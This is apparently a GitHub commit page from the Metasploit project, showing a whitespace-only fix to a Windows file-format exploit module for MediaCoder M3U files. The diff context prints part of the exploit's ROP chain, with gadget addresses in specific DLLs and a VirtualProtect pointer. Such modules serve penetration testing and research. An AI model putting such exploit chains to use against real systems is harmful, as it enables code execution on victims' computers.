Skip to content

Commit 16c9eff

Browse files
committed
make msftidy happy
1 parent 8de88cb commit 16c9eff

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

modules/exploits/windows/fileformat/mediacoder_m3u.rb

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -86,7 +86,7 @@ def exploit
8686
0x66d9d9ba, # NEG EAX # RETN [avutil-52.dll]
8787
0x6ab2241d, # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll]
8888
junk(15), # reserve more junk for add esp,2c
89-
0x1004cc03, # POP ECX # RETN [jpeg.dll]
89+
0x1004cc03, # POP ECX # RETN [jpeg.dll]
9090
0x6ab561b0, # ptr to &VirtualProtect() [IAT swscale-2.dll]
9191
0x66d9feee, # MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll]
9292
0x6ab19780, # XCHG EAX,ESI # RETN [swscale-2.dll]
@@ -100,7 +100,7 @@ def exploit
100100
0x66d8ae48, # XCHG ECX,EBX # RETN [avutil-52.dll]
101101
0x1005f6e4, # ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll]
102102
0x6ab3d688, # POP ECX # RETN [jpeg.dll]
103-
0x6ab4ead0, # Writable address [avutil-52.dll]
103+
0x6ab4ead0, # Writable address [avutil-52.dll]
104104
0x100444e3, # POP EDI # RETN [swscale-2.dll]
105105
nops(true), # ROP NOP [swscale-2.dll]
106106
0x100482ff, # POP EAX # POP EBP # RETN [jpeg.dll]

0 commit comments

Comments
 (0)